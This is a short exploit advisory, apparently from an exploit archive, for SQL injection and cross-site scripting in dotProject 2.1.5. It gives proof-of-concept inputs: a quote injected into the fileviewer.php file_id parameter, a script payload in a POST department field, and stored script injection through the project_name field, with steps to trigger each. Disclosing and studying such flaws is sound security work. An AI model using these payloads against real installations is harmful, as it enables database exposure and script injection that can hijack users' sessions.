# exploit title: sql injection in dotproject 2.1.5
# date 21.o2.2o11
# author: lemlajt
# software : dotproject
# version: 2.1.5
# tested on: linux
# cve :
# http://dotproject.net/
PoC :
http://localhost/www/cmsadmins/dotpro/dotproject/fileviewer.php?file_id='
in src:
2 ./dotproject/fileviewer.php:
127 db_loadHash('SELECT * FROM (`dotp_files`) WHERE file_id = -9',NULL)
another xss/sqli is here:
POST http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects
$department=company_1"><script>alert(1)</script>
we get an error with sql infos and xss.
1. visit
http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects&a=addedit
(adding new project)
2. POST $project_name="><script>
persistant.here</script> and choose 'company' to submit the form.
3. to see some affects just visit new project page: (in this example)
http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects&a=view&project_id=2
# *
regards!
o/